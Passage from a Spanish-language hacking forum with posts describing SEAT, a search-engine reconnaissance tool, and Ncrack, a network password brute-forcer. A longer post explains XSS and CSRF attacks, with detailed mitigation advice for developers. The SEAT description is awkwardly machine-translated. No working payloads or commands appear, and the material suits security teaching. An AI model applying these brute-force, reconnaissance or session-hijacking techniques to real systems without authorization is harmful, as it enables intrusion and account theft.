SEAT (Search Engine Assessment Tool) es la información de generación próxima aplicación de excavación orientada hacia las necesidades de los profesionales de la seguridad. SEAT utiliza la información almacenada en las bases de datos del motor de búsqueda, repositorios de caché y otros recursos públicos para analizar un sitio para las vulnerabilidades potenciales. Es capacidades de multiproceso, lo y multi search engine permiso de navegación fácil a través de grandes cantidades de información con el objetivo de la evaluación de la seguridad del sistema. Además, capacidad de asiento para procesar fácilmente firmas de motor de búsqueda adicionales, así como bases de datos de vulnerabilidades personalizadas de hecho permite a los profesionales de seguridad para asiento se adaptan a sus necesidades específicas.

Buscadores soportados:

    o Google
    o Yahoo
    o MSN
    o AltaVista
    o AllTheWeb
    o AOL
    o DMOZ

Bases de datos de vulnerabilidades:

    o GHDB
    o NIKTO
    o GSDB
    o WMAP
    o URLCHK
    o NESTEA

Características avanzadas:

   o nombres de dominio de las minas o pertenecientes a un sitio de destino
   o indirectamente escanear un rango de direcciones IP
   o crear rápidamente nuevas firmas de motor de búsqueda personalizadas y bases de datos de vulnerabilidad.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#79
Hacking / Ncrack
Noviembre 23, 2012, 10:42:58 PM

Ncrack es una herramienta de cracking de autenticación de red de alta velocidad. Fue construido para ayudar a las empresas a proteger sus redes proactivamente prueba todos sus hosts y dispositivos para pobres contraseñas de red. Profesionales de la seguridad también se basan en Ncrack cuando sus clientes de auditoría. Ncrack fue diseñado con un enfoque modular, una sintaxis de línea de comandos similar a Nmap y un motor dinámico que puede adaptar su comportamiento basado en la retroalimentación de la red. Permite la rápida, pero confiable auditoría a gran escala de múltiples hosts.

Características de ncrack incluyen una interfaz muy flexible el usuario el control completo de operaciones de red, permitiendo ataques bruteforcing muy sofisticado, sincronización de plantillas para la facilidad de uso, interacción de tiempo de ejecución similar a la de Nmap y muchos más. Protocolos soportados incluyen RDP, SSH, http (s), SMB, pop3(s), VNC, FTP y telnet.

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#80
Bugs y Exploits / Cross-Site Scripting (XSS)
Noviembre 20, 2012, 10:19:02 PM
¿Qué es y cómo opera un ataque de Cross-Site Scripting (XSS)?
   
    Definición
    Tipos de ataques
    Consideraciones
    PDF XSS
    XSRF

Definición

XSS es un ataque de inyección de código malicioso para su posterior ejecución que puede realizarse a sitios web, aplicaciones locales e incluso al propio navegador.

Sucede cuando un usuario mal intencionado envía código malicioso a la aplicación web y se coloca en forma de un hipervínculo para conducir al usuario a otro sitio web, mensajería instantánea o un correo electrónico.


Generalmente, si el código malicioso se encuentra en forma de hipervínculo es codificado en HEX (basado en el sistema de numeración hexadecimal, base 16) o algún otro, así cuando el usuario lo vea, no le parecerá sospechoso. De esta manera, los datos ingresados por el usuario son enviados a otro sitio, cuya pantalla es muy similar al sitio web original.

De esta manera, es posible secuestrar una sesión, robar cookies y cambiar la configuración de una cuenta de usuario.





Tipos de ataques

Las diversas variantes de esta vulnerabilidad pueden dividirse en dos grandes grupos: el primero se conoce como XSS persistente o directo y el segundo como XSS reflejado o indirecto.

Directo o persistente. Consiste en invadir código HTML mediante la inclusión de etiquetas <script> y <frame> en sitios que lo permiten.

Local. Es una de las variantes del XSS directo, uno de sus objetivos consiste en explotar las vulnerabilidades del mismo código fuente o página web. Esas vulnerabilidades son resultado del uso indebido del DOM (Modelo de Objetos del Documento, es un conjunto estandarizado de objetos para representar páginas web) con JavaScript, lo cual permite abrir otra página web con código malicioso JavaScript incrustado, afectando el código de la primera página en el sistema local. Cuando el XSS es local, ningún código malicioso es enviado al servidor. El funcionamiento toma lugar completamente en la máquina del cliente, pero modifica la página proporcionada por el sitio web antes de que sea interpretada por el navegador para que se comporte como si se realizara la carga maliciosa en el cliente desde el servidor. Esto significa que la protección del lado del servidor que filtra el código malicioso no funciona en este tipo de vulnerabilidad.

Indirecto o reflejado. Funciona modificando valores que la aplicación web pasa de una página a otra, sin emplear sesiones. Sucede cuando se envía un mensaje o ruta en una URL, una cookie o en la cabecera HTTP (pudiendo extenderse al DOM del navegador).




Consideraciones

Como desarrollador

La aplicación web que se desee implementar debe contar con un buen diseño. Posteriormente, se deben realizar diversos tipos de pruebas antes de su liberación, para detectar posibles fallos y  huecos de seguridad, mediante el empleo de alguna herramienta automatizada. También, es conveniente proporcionar mantenimiento a la aplicación y estar actualizado en las versiones de las herramientas que se emplean para su puesta en marcha.

Algunas recomendaciones para mitigar el problema, son:

Emplear librerías verificadas o algún framework que ayude a disminuir el inconveniente. Por ejemplo: la librería anti-XSS de Microsoft, el módulo ESAPI de codificación de OWASP, Apache Wicket, entre otros.

Entender el contexto en el cual los datos serán usados y la codificación de los mismos, este aspecto es importante cuando se envían datos de un componente a otro de la aplicación o cuando se deben enviar a otra aplicación.

Conocer todas las áreas potenciales donde las entradas no verificadas pueden acceder al software: parámetros o argumentos, cookies, información de la red, variables de entorno, resultados de consultas, búsqueda de DNS reversible, peticiones enviadas en las cabeceras, componentes de la URL, correos electrónicos, archivos, nombres de archivo, bases de datos o algún sistema externo que proporcione información a la aplicación.

Las validaciones de datos de entrada, deben realizarse siempre del lado del servidor, no sólo en el lado del cliente. Los atacantes pueden evitar la validación realizada del lado del cliente modificando valores antes de realizar verificaciones o remover por completo esta validación.

En caso de ser posible, emplear mecanismos automatizados para separar cuidadosamente los datos del código fuente: revisión de comillas, codificación y validación automática que muchas veces se escapan al desarrollador.

Por cada página web generada, se recomienda emplear una codificación determinada de caracteres, ya que si no se especifica, el navegador puede dar un trato diferente a ciertas secuencias de caracteres especiales, permitiendo la apertura del cliente a posibles ataques.

Para mitigar el problema de ataque contra el uso de cookies, es conveniente indicar que tiene el formato de HttpOnly. En los navegadores que lo soportan, puede prevenirse que la cookie sea usada por scripts maliciosos desde el lado del cliente.

Se debe emplear una estrategia de validación de las entradas: rechazar aquellas que no cumplan con lo especificado, limpiar las que sean necesarias. Al validar, considérense  las características de cada entrada: longitud, tipo de dato, rango de valores aceptados, entradas perdidas o adicionales, sintaxis, consistencia con otras entradas proporcionadas y seguimiento de las reglas del negocio.

Cuando se construyan páginas web de forma dinámica (generadas de acuerdo a las entradas o solicitudes de los usuarios), es recomendable usar listas blancas estrictas. Todas las entradas deben ser limpiadas y validadas, incluidos cookies, campos ocultos, cabeceras y la propia dirección.

Cuando una cantidad aceptable de objetos, como nombres de archivo o URL es limitada o conocida, es conveniente crear una conjunto de asignaciones de valores de entrada fijo a los nombres de archivo o URL y rechazar todos los demás.

Se recomienda usar un firewall de aplicaciones capaz de detectar ataques cuando el código se genere dinámicamente, como medida de prevención, debe complementarse con otras para proporcionar defensa en profundidad.

Como Administrador de Bases de Datos

Así como el desarrollador debe validar las entradas proporcionadas por parte del usuario, el encargado de diseñar e implementar la base de datos debe considerar la seguridad de la misma, pues en ella se guarda la información proporcionada por los usuarios y es manipulada mediante la aplicación web. Los datos que serán almacenados, también pueden ser validados mediante el uso de constraints  (restricciones aplicables a los objetos de una base de datos: unique, default, not null, check) que restringen la entrada para cada campo.

PDF XSS [obsoleta]

Es una vulnerabilidad ampliamente usada para afectar el Acrobat Reader de Adobe. En este caso, si se abusa de las características para abrir archivos en Acrobat, un sitio bien protegido se vuelve vulnerable a un ataque de tipo XSS si da alojamiento a documentos en formato PDF.

Esto afecta seriamente, a menos que se actualice el Reader o se cambie la forma en que el navegador maneja dichos documentos.

Una manera de combatirlo, si se cuenta con el servidor de aplicaciones web Apache, es llevar a cabo la correcta configuración de ModSecurity, ya que cuenta con directivas de protección para archivos en formato PDF.

XSRF

Un ataque Cross-Site Request Forgery (XSRF ó también CSRF) explota la confianza que un usuario tiene hacia las entradas proporcionadas por un sitio.

Por ejemplo: un usuario se encuentra autenticado y navegando en un sitio, en ese momento un atacante obtiene el control de su navegador, con él realiza una solicitud a una tarea de una URL válida del sitio, por lo que el atacante tendrá acceso como si fuera el usuario previamente registrado.

Distintivamente, un atacante intercalará código HTML o JavaScript malicioso en un correo o en una tarea específica accesible desde una URL, que se ejecuta ya sea directamente o empleando un error de tipo XSS. También, es posible realizar inyección a través de lenguajes como el BBCode. Este tipo de ataques son difíciles de detectar.

Muchas de las funcionalidades de un sitio web son susceptibles de uso durante un ataque XSRF. Esto incluye información enviada tanto por GET como por POST.

También puede usarse como vector para explotar vulnerabilidades de tipo XSS en una aplicación. Ejemplos de ello son: una vulnerabilidad de tipo XSS en un foro donde un atacante puede obligar al usuario a publicar –sin que éste se dé cuenta- un gusano informático. Un atacante puede también usar XSRF para transmitir un ataque a algún sitio de su elección, así como realizar un DDos.

Sin embargo, las formas más comunes de realizar este tipo de ataque consisten en usar la etiqueta HTML o el objeto JavaScript empleados para imágenes. Distintivamente, el atacante infiltrará un email o sitio web en ellos, así cuando el usuario cargue la página o el correo electrónico, también estará realizando la petición a la URL que haya colocado el atacante.

Un atacante puede instalar su script dentro de un documento de Word, un archivo de flash, un clip de video, redifusión web RSS o Atom, o algún otro tipo de formato que pueda alojar el script.

Si un sitio web permite ejecutar sus funciones empleando una URL estática o peticiones POST, es posible que sea vulnerable, si la función se lleva a cabo mediante la petición GET, el riesgo es mayor. Si se realizan las mismas funciones,  de la misma forma repetidamente, entonces la aplicación puede ser vulnerable.

Un ataque XSRF no puede evitarse mediante la verificación del referer de las cabeceras de la petición realizada, ya que puede "limpiarse" o modificarse mediante algún tipo de filtro. Las cabeceras pueden falsearse usando XMLHTTP, por ejemplo.

Una de las soluciones más conocidas, consiste en adjuntar un token no predecible y cambiante a cada petición. Es importante que el estado de éste vaya asociado con la sesión del usuario, de otra manera un atacante puede adjuntar su propio token válido y emplearlo en su beneficio. Adicionalmente, al ligarlo a la sesión del usuario es importante limitar el periodo durante el cual será válido.




Referencias

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta